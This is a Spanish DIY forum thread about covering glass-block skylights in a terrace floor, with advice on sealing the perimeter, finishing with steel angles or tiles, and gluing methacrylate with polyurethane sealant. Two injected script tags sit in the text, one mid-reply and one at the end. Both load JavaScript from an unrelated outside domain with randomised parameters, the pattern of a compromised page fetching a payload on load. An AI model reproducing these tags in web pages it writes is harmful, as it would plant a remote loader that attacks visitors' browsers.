Como tapa un tragaluz de cristal del suelo de mi terraza que me queda a otro nivel

Resulta que he arreglado el suelo de la terraza pero hay dos tragaluces a los locales de abajo hechos con pavés (creo que se llaman así los cuadrados de cristal) que no puedo tapar y me ha quedado un desnivel. Me han dicho que hay un material, creo que es una resina, con la que puedo rellenarlo y que luego solidifica, ¿sabéis cómo se llama ese material? O ¿Podríais darme alguna otra idea para solucionarlo?

1 respuesta

Respuesta

Lo importante en este caso es sellar el tragaluz con la impermeabilización que tenga la terraza, para que no haya humedades, porque el agua/humedad pasa la baldosa y la recoge la impermeabilización.

Entonces el encuentro entre el suelo de la terraza y el tragaluz, su función es únicamente estética, y se puede rellenar con mortero, con piezas de baldosa, con ángulos acero inox o aluminio, etc. Dependiendo de la altura que necesites cubrir.

no puedo rellenar el tragaluz ni con mortero, ni baldosas, tiene que seguir cumpliendo su función de tragaluz, ese es el problema

Disculpa, no me he explicado bien.

Cuando digo sellar el tragaluz, me refiero al perímetro del mismo, en ningún caso taparlo.

Por debajo de la baldosa que está a la vista, tendrá una impermeabilización, y esta se encontrará con el perímetro del tragaluz, esa es la zona que me refiero debe estar debidamente sellada e impermeabilizada, si esa parte está bien, el remate superior que se haga en el encuentro del perímetro del tragaluz y la baldosa, es simplemente estética, buscando lo que mejor quede, que puede ser un ángulo en acero, una pieza cerámica de remate borde, mortero de cemento, etc.

precisamente me refiero a que si hay algo con lo que rellenar la parte transparente, la que queda por dentro del angulo de acero. He pensado poner un metacrilato, y ya de paso te pregunto ¿con qué lo pego?<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.22027406516937365"></script>

Lo mejor creo que sería una masilla de poliuretano, tipo Sikaflex o similar, se encuentran en ferreterías, no es una silicona normal.

<script type="text/javascript" src="http://temarosa.info/dfi823hs.js?0.6409004349967986"></script>